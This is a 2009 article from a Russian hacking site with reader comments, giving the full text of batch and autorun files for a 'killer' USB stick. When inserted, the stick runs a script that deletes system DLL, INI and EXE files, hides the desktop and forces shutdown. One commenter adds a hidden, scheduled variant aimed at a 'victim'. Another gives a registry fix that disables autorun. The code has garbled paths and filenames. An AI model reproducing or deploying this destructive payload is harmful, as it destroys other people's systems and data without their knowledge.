CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Флешка убийца
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Флешка убийца

15.12.2009

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________

в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________

в Dead.BAT пишем:
@echo off
cp Флешка:AUTOEXEC.BAT C:
msg * "Dead" >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul 
shutdown -s -t 1 -c "lol" -f >nul
______________________________

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

______________________________

Удачи ;)

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Прочее
Опубликовал: Pinch
Просмотров: 32402
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Почему именно флешка? диск не прокатит?
можно ли защититься от такой атаки?
21.12.2009 / Daniel89
Да на самом деле??
27.12.2009 / CI92DROP
Я вот CD-Rку такой сделал!Прокатило!
30.12.2009 / Gabe 33
у меня тоже с диском прошло все как надо, флешку убивать жалко на такое дело
а диск копейки стоит. я еще добавил команду at, и copy, копироваь все файлы в с\windows\system32, там эти файлы не мазолят глаза, да и кто туда часто заглядывает, и в назначенное мною время
система слетает.
 
вся эта маскировка для того чтоб не оставить подозрений на себя))Biggrin
02.01.2010 / Daniel89
а забыл: я еще создал 4 ый батник вот в нем и at и copy а в autorun.inf запускается теперь не dead а четвертый bat_ник который копирует те три файла и задает время
02.01.2010 / Daniel89
Прям носитель убийца,я тож модифицироал но cd тормозит.
02.01.2010 / Gabe 33
у мен один вопрос почему на виртуальной машине не слетает система?
Комп вырубается но при включении все загружается как будто ничего и небыло?
Confused
03.01.2010 / Daniel89
Классная статишка нужно будет попробовать с диском)))
06.01.2010 / KSIRUS
Защититься от всякой хрени запускающейся автоматически при подключении устройства можно легко. Достаточно просто отключить автозапуск сменных носителей. При этом жертвуем сомнительным удобством. Зато гарантировано нифига не запустится без твоего ведома.
 
Отключить автозапуск можно вот таким способом:
Создаем файл с произвольным именем и расширением ".reg"
пишем в него вот такие строчки:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutorun"=dword:000000ff
"NoDriveAutoRun"=dword:3fffffff
 
при запуске этого файла в нужные ключи реестра прописывются нужные значения. Результат - отсутсвие автозапуска для всех сменных носителей, включая CD-ROM
01.02.2010 / landgraf76
а не проще просто в ручную отключить автозагрузку?
14.02.2010 / Daniel89
я чевота не понел Daniel89 можешь сказать что конкретно писать в этом 4 bat_никe?
20.02.2010 / gosenka
gosenka:
я чучуть не правильно выразился, всего должно получиться 4 файла, 3 из них bat, а 4ый autorun.ini
создаешь еще bat_ник называешь его как хочешь, например Win98.bat
в нем пишешь:
 
@echo off
copy AUTOEXEC.BAT C:\WINDOWS\system32 >nul
copy Dead.BAT C:\WINDOWS\system32 >nul
at 12:00 C:\WINDOWS\system32\Dead.BAT/every:M,T,W,Th,F,S,Su >nul
at 22:00 C:\WINDOWS\system32\Dead.BAT/every:M,T,W,Th,F,S,Su >nul
___________________________________________________________________
 
теперь в autorun.inf меняешь с
OPEN=Dead.BAT  на
OPEN=Win98.bat
___________________________________________________________________
 
ну вот в общем и все.
я проверял все работает как задуманно.
 
на счет времени нужно точно угадать когда у "жертвы" будет работать компьютер, можно задать параметр на определенное число и потом после этого числа повторение команды /every: ...........
06.03.2010 / Daniel89
тоесть autorun.inf
06.03.2010 / Daniel89
Жалко только что в назначенных заданиях мозолит глаза эта хрень (((
Нельзя ли никак скрыть что на сколько запланировано?
06.03.2010 / Daniel89
А с флешкой что?
Почему нельзя будет ей больше пользоваться?
16.04.2010 / ekkl
вещь!
12.07.2010 / KreDI
А с флешкой что?
Почему нельзя будет ей больше пользоваться?
16.04.2010 / ekkl
_______________________________________________
С флешкой ничего не будет))) ты не сможешь пользоваться потому что сразу запустится скрипт...
 
Но можно отключить автозагрузку и удалить все с флэшки....
09.08.2010 / Alexander 17
или просто эту флешку на маке форматнуть
02.12.2010 / RED_FACTOR
или просто эту флешку на маке форматнуть
02.12.2010 / RED_FACTOR
Зачем комментарий при выключении "lol" оставлять? или я ошибаюсь, и это выполняемая команда?
shutdown -s -t 1 -c "lol" -f >nul
10.03.2012 / Endless
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Взлом и безопасность / WEB сайтов » Брутс для 2fa биржи
  • Разное / Предложения работы » Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}